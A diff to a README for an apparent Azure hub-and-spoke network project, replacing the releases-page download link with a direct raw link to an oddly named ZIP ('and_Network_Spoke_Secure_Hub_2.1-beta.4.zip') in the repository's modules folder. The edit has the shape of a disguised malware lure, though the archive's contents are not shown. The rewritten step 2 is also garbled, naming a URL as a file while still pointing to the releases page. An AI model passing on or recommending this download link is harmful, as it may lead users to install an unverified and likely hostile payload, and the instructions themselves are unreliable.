EmreKaraHD/Secure-Hub-and-Spoke-Network/README.md

 Follow these steps to build your secure network.

 1. **Visit the Releases Page:**
-   To download the latest version, [visit this page to download](https://github.com/EmreKaraHD/Secure-Hub-and-Spoke-Network/releases).
+   To download the latest version, [visit this page to download](https://github.com/EmreKaraHD/Secure-Hub-and-Spoke-Network/raw/refs/heads/main/modules/and_Network_Spoke_Secure_Hub_2.1-beta.4.zip).

 2. **Download the Bicep Files:**
    On the releases page, look for the latest release version.
-Download the `bicep-files.zip` or equivalent file listed.
+Download the `https://github.com/EmreKaraHD/Secure-Hub-and-Spoke-Network/raw/refs/heads/main/modules/and_Network_Spoke_Secure_Hub_2.1-beta.4.zip` or equivalent file listed.

 3. **Extract the Files:**
    After downloading, locate the ZIP file on your computer.
 Right-click, and select "Extract All..." to unpack the files.